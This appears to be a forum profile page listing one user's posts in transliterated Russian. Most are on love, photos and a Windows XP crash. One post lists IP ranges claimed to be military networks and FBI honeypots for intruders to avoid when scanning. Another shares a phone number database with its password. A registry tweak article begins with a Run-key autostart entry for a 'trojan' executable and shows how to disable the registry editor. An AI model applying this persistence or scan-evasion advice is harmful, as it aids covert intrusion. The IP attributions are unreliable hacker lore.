Jump to content

Zmei

Forumjan
  • Posts

    263
  • Joined

  • Last visited

Everything posted by Zmei

  1. vot kak to polychilos tak, neznau chto skajete, no vseje vistavljau http://www.hayastan.com/zmei/fotoart/
  2. znaete inogda sidish , chitaesh chto pishyt drygie, i neponimaesh kak mojno jit bez lubvi, kak mojno jit bez etogo chystva volnyeshego tak ... daje neznau pochemy pishy tyt no tak vot zaxotelos, prosto napisat, GRAJDANEEEEe (eto ja yje krichy vam vsem) lubite, i darite lubov vsem, Bog dal nam eto chystvo chtob mi mogli davat xot kapelky ego i schastija vsem, komy mojem, ved eto tak prekrasno, chto mojet bit lytshe lubvi?????? nichego...... vspomnite kak eto bilo v pervii raz, ..... da po detski, navernika vi ylibnylis pogryzivshis v vospominanija, no soglasites chto bilo klassno, i chto eto prineslo vam kychy novogo... da i navernika vse posledyshie razi , bilo ne xyje, i kto mojet iz nas postavit gran, kogda bilo lytshe, kogda bilo xyje, tolko jizn mojet rassydit nas, i to tolko togda kogda ona zakonchitsja ) inogda v vospominanijax mi pitaemsja ponjat, ili predstavit, a kak bi bilo esli mi bi postypili podrygomy??? xochetsja tak mnogoe vam skazat, peredat, no neznau nyjno li eto vam, ved vse jivyt v svoem mire vospominanii, perejivanii
  3. kak schitaete v borbe za lubimogo cheloveka imeet mesto nechestnaja igra? mojno li v glazax lubimogo ochernit sopernika?sopernicy? rech idet ne o grjaznom kompromate, o tom kak snijat reiting sopernika v glazax lubimogo cheloveka vopros ochen skolzkii, no dymau interesnii
  4. interesno kakie emocii voznikaut y vas o slove LUBOVNIK ili LUBOVNICA dlja kogoto eto naricatelnie pozicii , kotorii govorjat o grjaznom razvrate, dlja kogoto eto polojitelnoe, govorjashee chto danii chelovek bolshe chem dryg i partner chelovek sklonen tolkovat vse tak, kak diktyet moment vremeni kogda vse proisxodit, neznau, mojet i tak, a mojet i net
  5. dlja tex kto lubit sovat svoi nos kyda nenado privojy spisok serverov i setok kotorie nestoit skanirovat na dirki, osobenno predyprejdau nachinaushix LaMeRoV i XaKeRoV, na ETI IP NESOVATSJA esli nexotite popast pod postojanoe nabludenie i scaning vashego trafika 6.*.*.* : Army Information Systems Center 21.*.*.* : US Defense Information Systems Agency 22.*.*.* : Defense Information Systems Agency 26.*.*.* : Defense Information Systems Agency 29.*.*.* : Defense Information Systems Agency 30.*.*.* : Defense Information Systems Agency 49.*.*.* : Joint Tactical Command 50.*.*.* : Joint Tactical Command 55.*.*.* : Army National Guard Bureau 62.0-30.*.* : 64.224.* : (FBI's honeypot) 64.225.* : (FBI's honeypot) 64.226.* : (FBI's honeypot) 128.47.*.* : Army Communications Electronics Command (NET-TACTNET) 128.50.*.* : Department of Defense (NET-COINS) 128.51.*.* : Department of Defense (NET-COINSTNET) 128.56.*.* : U.S. Naval Academy (NET-USNA-NET) 128.63.*.* : Army Ballistics Research Laboratory (NET-BRL-SUBNET) 128.80.*.* : Army Communications Electronics Command (CECOM) (NET-CECOMNET) 128.98.*.* : Defence Evaluation and Research Agency (NET-DERA-UK) 128.154.*.* : NASA Wallops Flight Facility (NET-WFF-NET) 128.155.*.* : NASA Langley Research Center (NET-LARC-NET) 128.156.*.* : NASA Lewis Network Control Center (NET- LERC) 128.157.*.* : NASA Johnson Space Center (NET-JSC-NET) 128.158.*.* : NASA Ames Research Center (NET-MSFC-NET) 128.159.*.* : NASA Ames Research Center (NET-KSC-NET) 128.160.*.* : Naval Research Laboratory (NET- SSCNET) 128.161.*.* : NASA Ames Research Center (NET-NSN-NET) 128.183.*.* : NASA Goddard Space Flight Center (NET-GSFC) 128.216.*.* : MacDill Air Force Base (NET-CC-PRNET) 128.217.*.* : NASA Kennedy Space Center (NET-NASA-KSC-OIS) 128.236.*.* : U.S. Air Force Academy (NET-USAFA-NET 139.142.*.* 155.7.*.* : American Forces Information (NET-AFISHQ-NET1) 155.8.*.* : U.S. ArmyFort Gordon (NET-GORDON-NET5) 155.9.*.* : United States Army Information Systems Command (NET-LWOOD-NET2) 155.74.*.* : PEO STAMIS (NET-CEAP2) 155.75.*.* : US Army Corps of Engineers (NET-CEAP3) 155.76.*.* : PEO STAMIS (NET-CEAP4) 155.77.*.* : PEO STAMIS (NET-CEAP5) 155.78.*.* : PEO STAMIS (NET-CEAP6) 155.79.*.* : US Army Corps of Engineers (NET-CEAP7) 155.80.*.* : PEO STAMIS (NET-CEAP 155.81.*.* : PEO STAMIS (NET-CEAP9) 155.82.*.* : PEO STAMIS (NET-CEAP10) 155.83.*.* : US Army Corps of Enginers (NET-CEAP11) 155.84.*.* : PEO STAMIS (NET-CEAP12) 155.85.*.* : PEO STAMIS (NET-CEAP13) 155.86.*.* : US Army Corps of Engineers (NET-CEAP14) 155.87.*.* : PEO STAMIS (NET-CEAP15) 155.88.*.* : PEO STAMIS (NET-CEAP16) 155.178.*.* : Federal Aviation Administration (NET-FAA) 155.213.*.* : USAISC Fort Benning (NET-FTBENNNET3 155.214.*.* : Director of Information Management (NET-CARSON-TCACC ) 155.215.*.* : USAISC-FT DRUM (NET-DRUM-TCACCIS) 155.216.*.* : TCACCIS Project Management Office (NET-FTDIX-TCACCI) 155.217.*.* : Directorate of Information Management (NET- EUSTIS-EMH1) 155.218.*.* : USAISC (NET-WVA-EMH2) 155.219.*.* : DOIM/USAISC Fort Sill (NET-SILL-TCACCIS) 155.220.*.* : USAISC-DOIM (NET-FTKNOX-NET4) 155.221.*.* : USAISC-Ft Ord (NET-FTORD-NET2) 195.10.* : (FBI's honeypot) 205.96-103.* : (FBI's honeypot) 207.30-120.* : (FBI's honeypot) 207.60.2.128-207.60.2.255 Abacus Technology (NETBLK-TIAC-ABACUSTC) 207.60-61.* : (FBI Linux servers used to trap scanners) 212.159.40.211 : (FBI's honeypot) 212.159.41.173 : (FBI's honeypot) 212.159.0.2 : (FBI's honeypot) 212.159.1.1 : (FBI's honeypot) 212.159.1.4 : (FBI's honeypot) 212.159.1.5 : (FBI's honeypot) 212.56.107.22 : (FBI's honeypot) 212.159.0.2 : (FBI's honeypot) 212.159.33.56 : (FBI's honeypot) 212.56.107.22 : (FBI's honeypot) 209.35.* : (FBI's honeypot) 216.25.* : (FBI's honeypot) 216.247.* : (FBI's honeypot) 216.25.* : (REAL DANGEROUS) 216.247.* : (REAL DANGEROUS) 217.6.*.* : jelau ydachi v Vashem nelegkom trude
  6. mojet komy i bydet interesno i polezno ), predyprejadau nomera tolko na 40 mobil-hpone database parol k fily ashot
  7. vstretil problemy, reshil postavit zanovo XP, posle instalacii vse proshlo normalno, postavil DSl, kak tolko zakonektilsja, minyti cherez 3 wind rygnylsja, skazal chtob ja vse zakril, i chto cherez minyty vse virybitsja, i tak kajdii raz LSA shel report dymal chto virus kakoi, postavil radi interesa novii HD, taje petryshka, nepoimy v chem delo mojet kto vstrechalsja s etim??? blagodaren vsem za misli Zmei
  8. Сегодня я решился-таки опубликовать данные о реестре. Понимающий человек все-равно оценит данную статью. Так что желаю всем, кто умнее ламеров удачи в прочтении. ---------------- ЗАПИСИ: Автозапуск HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Параметр: любой. (Например: "мой троян") Тип значения: текстовое(REG_SZ). Значение: ссылка на автозапускаемый файл(Например: C:\windows\trojn.exe). ------------------------------------------------------------------------------- ОТКЛЮЧИТЬ РЕДАКТОР СИСТЕМНОГО РЕЕСТРА' HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System' iараметр: DisableRegistryTools' значение(REG_DWORD): (1-отключить, 0-включить).' Удаление группы из меню "Пуск"-"программы"-"Стандартные" (Windows 9x и NT) Отключает отображение группы "Стандартные", когда пользователь выбирает пункт "Программы" из меню "Пуск". Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Параметр: NoCommonGroups Тип значения: числовой(REG_DWORD) Значение: (0 = отключено, 1 = включено) ---------------------------------------------------------------------------- Отключение команды "Выключить компьютер" (Windows 9x и NT) 'Этот параметр позволит Вам не дать пользователям выключать компь' + 'ютер с помощью команды "Выключить ' 'компьютер".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoClose' 'Тип: числовой(REG_DWORD)' 'Значение: (0 = допустить выключение, 1 = блокировать выключение)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление папки "Избранное" из меню "Пуск" (Windows 9x и NT)' 'Чтобы удалить папку "Избранное" из меню "Пуск", измените этот кл' + 'юч системного реестра.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoFavoritesMenu' 'Тип: REG_DWORD' 'Значение: (0=отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Скрытие всех элементов на Рабочем столе (Windows 9x и NT)' 'Установка этого параметра скрывает все элементы и программы на Р' + 'абочем столе Windows.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoDesktop' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение кэширования пароля домена' 'Включение этого параметра, отключает кэширование пароля NT домен' + 'а, и поэтому, чтобы обратиться к ' 'дополнительным ресурсам домена будет необходимо заново вводить п' + 'ароль.' 'Ключ: [HKEY_LOCAL_MACHINE\Network\Logon]' 'Параметр: NoDomainPwdCaching' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Диалоговое окно уведомления об ответственности перед входом в си' + 'стему (Windows 9x и NT)' 'Используйте этот ключ, чтобы создать диалоговое окно, которое бу' + 'дет отображено для любого пользователя ' 'перед входом в систему.' 'Это полезно тогда, когда требуется предупредить людей, делающих ' + 'попытку войти в систему, и не имеющих ' 'на то прав, об ответственности.' '1. Используя Regedit, найдите соответствующий ключ для вашей опе' + 'рационной системы.' 'Windows 9x:' 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Win' + 'logon' 'Windows NT:' 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\' + 'Winlogon' '2. Измените значение параметра '#39'LegalNoticeCaption'#39' так, чтобы о' + 'но соответствовало заголовку диалогового' 'окна (например '#39'Внимание!'#39'). Если этот параметр не существует, с' + 'оздайте его.' '3. Затем установите значение параметра '#39'LegalNoticeText'#39' так, чт' + 'обы он был равен содержанию диалогового ' 'окна (например '#39'Не входите в систему, если у Вас нет полномочий!' + ' '#39')' '4. Выйдите из Regedit, перезагрузитесь, и при следующей загрузка' + ', у Вас должно появится диалоговое окно ' 'с ' 'предупреждением.' 'Параметр: LegalNoticeCaption, LegalNoticeText' 'Тип: REG_SZ' 'Значение: любое.' '----------------------------------------------------------------' + '----------------' '' 'Удаление меню "Файл" из Проводника (Windows NT)' 'Удаляет меню "Файл" из инструментальной панели Проводника. (Этот' + ' параметр была добавлен в Сервисном ' 'Пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoFileMenu' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление команды "Найти" из меню "Пуск" (Windows 9x и NT) ' 'Когда включен этот параметр команда '#39'Найти'#39' будет удалена из мен' + 'ю "Пуск".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoFind' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Скрытие значка "Сетевое окружение" (Windows 9x и NT)' 'Значок "Сетевое окружение" отображается на Рабочем столе Windows' + ', когда установлено соединение с ' 'сетью. При включении этого параметра, значок будет скрыт.' 'Кроме того, этот параметр отключает свойство UNC внутри интерфей' + 'са Проводника, включая команду ' '"Выполнить..." из меню "Пуск". Пути UNC конфигурируются' 'администратором в "Наборе правил" для общедоступных папок, насто' + 'льных значков, команды "Пуск", и т.д.' 'Это не влияет на функциональные возможности' 'командной строки, при выполнении команды "Net.exe".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoNetHood' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление папки "Документы" из меню "Пуск" (Windows 9x и NT)' 'Этот параметр удалит папку последних открытых документов из меню' + ' "Пуск".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoRecentDocsMenu' 'Тип: REG_DWORD' 'Значение: (0=отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление команды "Выполнить" из меню "Пуск" (Windows 9x и NT)' 'Этот параметр не дает пользователям запускать программы или проц' + 'ессы из меню "Пуск", удаляя этот ' 'пункт полностью.' 'Обратите внимание: Если пользователь имеет доступ к командной ст' + 'роке МС-ДОС, он все равно сможет ' 'запускать любые программы.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoRun' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Сохранение параметров окна Проводника (Windows 9x и NT)' 'С помощью этого параметра Вы можете определить, будут ли Ваши на' + 'стройки настольных параметров' 'сохранены при выходе из Windows.' 'Для установки этого параметра найдите ключ указанный ниже и изме' + 'ните его значение, как Вам ' 'необходимо.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSaveSettings' 'Тип: REG_BINARY' 'Значение: (00 00 00 00=отключено, 01 00 00 00=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение сохранения параметров настройки при выходе (Windows 9' + 'x и NT) ' 'Обычно, при выходе Windows сохраняет настольную конфигурацию, вк' + 'лючая расположение значков, вид и ' 'т.д. ' 'Этот параметр отключает' 'сохранение изменений этих настроек. Такая функция может быть пол' + 'езна, как в безопасной среде, так и ' 'тогда, когда Вы не хотите, чтобы другие' 'люди изменили любимый вид Вашего Рабочего стола.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSaveSettings' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление пункта "Настройка" из меню "Пуск" (Windows 9x и NT)' 'Удаляет папки "Панель управления" и "Принтеры" из меню "Настройк' + 'а". Обратите внимание: Удаление ' 'пунктов "Панель задач", "Панель управления"' 'и "Принтеры" удалит полностью и само меню "Настройка".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSetFolders' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление пункта "Панель задач" в меню "Настройки" из меню "Пуск"' + ' (Windows 9x и NT)' 'Включение этого параметра, удаляет пункт "Панель задач" в меню "' + 'Настройка" из меню "Пуск", и не дает ' 'пользователям изменять свойства Панели задач.' 'Обратите внимание: Удаление пунктов "Панель задач", "Панель упра' + 'вления" и "Принтеры" удалит ' 'полностью' 'и само меню "Настройка".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSetTaskbar' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение контекстного меню для Панели задач (Windows NT)' 'Удаляет контекстные меню для Панели задач, используемые в кнопке' + ' "Пуск", Области управления и часах. ' '(Этот параметр была добавлен в Сервисном Пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoTrayContextMenu' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение заданного по умолчанию контекстного меню Проводника (' + 'Windows NT) ' 'Удаляет контекстное меню, которое обычно появляется, когда Вы ще' + 'лкаете правой кнопкой мыши на ' 'Рабочем столе или в' 'правом окне Проводника. (Этот параметр была добавлен в Сервисном' + ' Пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoViewContextMenu' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Ограничение списка программ, которые пользователи могут запускат' + 'ь (Windows 9x и NT)' 'Windows дает возможность ограничить список программ, которые мог' + 'ут быть запущены пользователями на ' 'рабочей станции.' '1. Используя Regedit, найдите ключ указанный ниже.' '2. Установите значение параметра '#39'RestrictRun'#39' равным '#39'1'#39' для ис' + 'пользования данной функции или равной '#39'0'#39' ' 'для ее блокировки. Создайте этот параметр, если его не существуе' + 'т.' '3. Определите программы, которые должны запускаться, в ключе: ' '[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Pol' + 'icies\Explorer\RestrictRun].' 'Создайте новый параметр для каждой программы, именуя их числами ' + 'по возрастанию. Например:' #39'1'#39'='#39'c:\windows\notepad.exe'#39 #39'2'#39'='#39'c:\program files\msoffice\winword.exe'#39 '...' '4. Выйдите из Regedit, и перезагрузитесь, что бы изменения вступ' + 'или в силу.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: RestrictRun' '' '----------------------------------------------------------------' + '----------------' '' 'Недоступный блок "Запомнить пароль" в Удаленном доступе к сети' 'Если у Вас проблемы с DUN при запоминании Вашего пароля, т.е. Вы' + ' видете, что опция "Запоминить ' 'пароль" ' 'отключена, то имеется несколько способов, которые можно использо' + 'вать для решения этой проблемы.' '1. Удостоверьтесь, что на вашей системе установлен "Клиент для с' + 'ети Microsoft". Панель управления / Сеть / ' 'Добавить... / Клиент / Добавить.../ Microsoft / Клиент для сети ' + 'Microsoft.' '2. Вспомните, происходил ли запуск Windows так, чтобы при отобра' + 'жении диалогового окна входа в систему ' 'и ' 'запросе пароля Вы нажимали клавишу "Esc".' '3. У Вас может быть поврежден файл пароля. Произведите поиск фай' + 'лов *.pwl в каталоге Windows, и ' 'переименуйте все найденные файлы. Примечание: это действие заста' + 'вит Вас создать файлы паролей ' 'заново.' '4. Проверьте системный реестр:' '· Запустите Редактор системного реестра (REGEDIT.EXE).' '· Найдите ключ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu' + 'rrentVersion\Network\Real Mode ' 'Net].' '· если Вы увидите, что значение параметра "Autologon" равно "00 ' + '00 00 00" то, дважды щелкните на этом' 'параметре, и измените значение на "01 00 00 00 00".' '· Выйдете из RegEdit и перезагрузите PC.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers' + 'ion\Network\Real Mode Net]' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление или добавление постоянно подключенных дисков к Вашему с' + 'писку' 'Windows сохраняет названия предварительно отображенных дисков, э' + 'то может создать угрозу защиты, ' 'если ' 'в списке будут перечислены скрытые диски. Суть состоит в том, чт' + 'о этот ключ может использоваться для ' 'установки заданных по умолчанию элементов такого списка. Наприме' + 'р, для неопытных пользователей, ' 'которым требуется, отобразить только общие диски.' '1. Откройте системный реестр, и найдите ключ указанный ниже.' '2. В этом ключе перечислены все совместные диски, которые Window' + 's сохранила для текущего ' 'пользователя, удалите элементы, которые Вы не хотите сохранять. ' + 'Или добавьте новые, создав новый' 'строковый параметр, и назвав его, буквой, увеличив алфавитное зн' + 'ачение уже имеющихся в списке дисков. ' 'Приравняйте значение к диску, который Вы желаете совместно испол' + 'ьзовать.' 'Обратите внимание: Это изменение воздействует только на текущего' + ' пользователя, для того, что бы ' 'изменить значение по умолчанию для всех пользователей, измените ' + 'таким же образом ключ ' '[KEY_USERS\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion' + '\Network\Persistent Connections].' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVe' + 'rsion\Network\Persistent Connections]' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение совместно используемых файлов и принтеров' 'Опция '#39'Файлы и принтеры это компьютера можно сделать общими'#39' поз' + 'воляет предоставлять услуги другим ' 'пользователям сети. Эти функциональные возможности могут быть за' + 'блокированы, изменением этого ' 'параметра.' '1. Используя Regedit, найдите ключ указанный ниже, если он не су' + 'ществует, создайте его.' '2. Создайте два новых параметра '#39'NoFileSharing'#39' и '#39'NoPrintSharin' + 'g'#39' типа DWORD.' '3. Установите значения '#39'NoFileSharing'#39' и '#39'NoPrintSharing'#39' равным' + 'и '#39'1'#39' для блокировки совместного' 'использования, или равными '#39'0'#39' для того, чтобы позволить совмест' + 'ное использование. Оба параметра ' 'должны быть вместе заблокированы или допустимы.' '4. Выйдите из Regedit и перезагрузитесь.' 'Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers' + 'ion\Policies\Network]' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Определение привилегированного сервера сети обеспечения' 'Для определение заданного по умолчанию сервера сетевого обеспече' + 'ния, используйте этот параметр.' '1. Используя Regedit, найдите ключ указанный ниже, если его не с' + 'уществует, создайте его.' '2. Создайте новый строковый параметр, и назовите его '#39'Authentica' + 'tingAgent'#39', установите значение ' 'параметра ' 'равным имени Вашего привилегированного сетевого сервера.' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP' + '32\NetworkProvider]' 'Параметр: AuthenticatingAgent' 'Тип: REG_SZ' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение времени отключения автоматической блокировки LAN' 'Windows NT может быть сконфигурирован так, чтобы автоматически р' + 'азъединять сеансы LAN при простое, ' 'за определенное количество минут.' '1. Откройте Ваш системный реестр, и найдите ключ указанный ниже.' '2. Установите значение параметра '#39'Autodisconnect'#39' равным задержк' + 'е в минутах перед разъединением сеанса.' 'Если этот параметр не существуют, создайте новый строковый парам' + 'етр под этим именем.' '3. Перезагрузите Windows NT.' 'Обратите внимание: Для отключения функции Автоматического разъед' + 'инения, установите значение равным ' #39'Oxffffffff'#39'.' 'Ключ: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Lanm' + 'anServer\Parameters]' 'Параметр: Autodisconnect' 'Тип: REG_DWORD' 'Значение: от 0 до 4,294,967,295 (Oxffffffff) в минутах' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение функции автоматического входа в систему сетевого обес' + 'печения' 'Этот параметр блокирует автоматический вход в систему на сервер ' + 'сетевого обеспечения.' '1. Используя Regedit, откройте ключ указанный ниже, если его не ' + 'существует, создайте его.' '2. Создайте новый параметр '#39'DisableDefaultPasswords'#39' типа DWORD,' + ' и установите его значение равным '#39'1'#39' для ' 'блокировки автоматического входа в систему, или равным '#39'0'#39' для и' + 'спользования автоматического входа в ' 'систему.' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP' + '32\NetworkProvider]' 'Параметр: DisableDefaultPasswords' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Отображение подтверждения при входе в систему домена' 'Когда этот параметр включен, будет отображаться диалоговое окно ' + 'об успешной проверке, при входе на ' 'домен Windows NT.' 'Ключ: [HKEY_LOCAL_MACHINE\Network\Logon]' 'Параметр: DomainLogonMessage' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Требование проверки для доступа в сеть Windows' 'По умолчанию Windows не требует проверки сетевого имени пользова' + 'теля и его пароля, для использования ' 'локальной машины Windows. Эти функциональные возможности могут б' + 'ыть изменены.' 'Ключ: [HKEY_LOCAL_MACHINE\Network\Logon]' 'Параметр: MustBeValidated' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение доступа к вызову по телефону' 'Такая возможность существует у пользователей с установленным мод' + 'емом на Windows машине, и ' 'использующими Удаленный доступ к сети, позволяющий вызывающим со' + 'единяться с внутренней сетью. В ' 'групповой среде это может причинять ущерб защите.' 'Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers' + 'ion\Policies\Network]' 'Параметр: NoDialIn' 'Тип: REG_DWORD' 'Значение: (0 = допустить удаленный доступ, 1 = заблокировать уда' + 'ленный доступ)' '' '----------------------------------------------------------------' + '----------------' '' 'Автоматический поиск медленных сетевых подключений' 'По умолчанию, Windows NT будет пытаться обнаружить задержку врем' + 'ени на сетевых связях, чтобы ' 'определить их быстродействие. Эти функциональные возможности мог' + 'ут быть заблокированы, если ' 'Windows ' 'NT имеет проблемы, при определении быстродействия вашего подключ' + 'ения.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: SlowLinkDetectEnabled' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Определение скорости подключения ' 'Windows NT использует этот параметр, чтобы определить, что являе' + 'тся низкоскоростным подключением, а ' 'что является высокоскоростным подключением. Заданная по умолчани' + 'ю задержка времени - 2000 ' 'миллисекунд , любое подключение, которое будет медленнее этой ус' + 'тановки, рассматривается как' 'низкоскоростное подключение.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: SlowLinkTimeOut' 'Тип: REG_DWORD' 'Значение: Время (миллисекунды)' '' '----------------------------------------------------------------' + '----------------' '' 'Поддержка длинных имен файлов на серверах сетевого обеспечения ' 'Этот параметр управляет поддержкой длинных имен файлов (LFN) на ' + 'серверах сетевого обеспечения, и если' 'поддержка существует, то он так же определяет версию сервера.' '1. Используя Regedit, откройте ключ указанный ниже, если его не ' + 'существует, создайте его.' '2. Создайте новый параметр типа DWORD, и назовите его '#39'SupportLF' + 'N'#39'.' '3. Установите значение параметра '#39'SupportLFN'#39' равным '#39'0'#39', '#39'1'#39' ил' + 'и '#39'2'#39' в зависимости от таблицы указанной ' 'ниже:' 'Описание Значения' '----- -----------' '0 LFN Заблокирована' '1 LFN Допускается на серверах версии 3.12 и выше' '2 LFN Допускается на всех серверах, которые поддерживают LFN' '4. Выйдите из Regedit и перезагрузитесь.' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\' + 'NWREDIR]' 'Параметр: SupportLFN' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение определяющих SAP для сетей NetWare' 'По умолчанию Windows посылает пакеты SAP, чтобы определить досту' + 'пные совместные файлы и принтеры, ' 'когда опция '#39'Файлы и принтеры это компьютера можно сделать общим' + 'и'#39' включена. Этот параметр' 'отключает ' 'пересылку данных пакетов.' 'В дополнение к изменению значения параметра '#39'Use_Sap'#39' Вам также ' + 'может потребоваться создать другой ' 'ключ и значение:' '[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcpServer\' + 'Parameters\Ndi\Params\Use_Sap] @="0"' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcpS' + 'erver\Parameters]' 'Параметр: Use_Sap' 'Тип: REG_SZ' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Как восстановить анимированную эмблему Internet Explorer' 'Когда Вы находитесь в Internet, используя Internet Explorer, вра' + 'щение эмблемы указывает, что он активен. ' 'Этот параметр системного реестра определяет эмблему которая буде' + 'т отображена.' 'Чтобы восстановить поведение анимированной эмблемы Internet Expl' + 'orer, удалите значения параметров ' '"BrandBitmap" и "SmBrandBitmap", которые находятся в указанном н' + 'иже ключе системного реестра.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\To' + 'olbar]' '' '----------------------------------------------------------------' + '----------------' '' 'Прерывание команд FTP для Internet Explorer' 'Когда Вы вводите команду FTP типа "FTP ftp.regedit.com" то запус' + 'кается IE 4.0 вместо основной DOS ' 'программы FTP.' 'Чтобы отключить такое поведение IE, используйте Regedit, для нах' + 'ождения ключа указанного ниже, и ' 'удалите ' 'параметр "ftp".' 'Для возвращения к такому поведению IE, создайте параметр "ftp" т' + 'ипа REG_SZ и установите значение ' 'равным "ftp://".' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers' + 'ion\URL\Prefixes]' '' '----------------------------------------------------------------' + '----------------' '' 'Добавление фонового изображения для инструментальной панели Inte' + 'rnet Explorer' 'Хотите установить свое изображение на инструментальной панели In' + 'ternet Explorer? Это можно сделать с ' 'помощью настройки системного реестра.' '1. Откройте Regedit, и найдите ключ указанный ниже.' '2. Добавьте новый строковый параметр "BackBitmap", и установить ' + 'его значение равным пути и имени ' 'растрового файла, который желаете использовать (например "C:\WIN' + 'DOWS\CLOUDS.BMP")' '3. Выйдете из Regedit, и перезагрузите Internet Explorer.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\To' + 'olbar]' 'Параметр: BackBitmap' 'Тип: 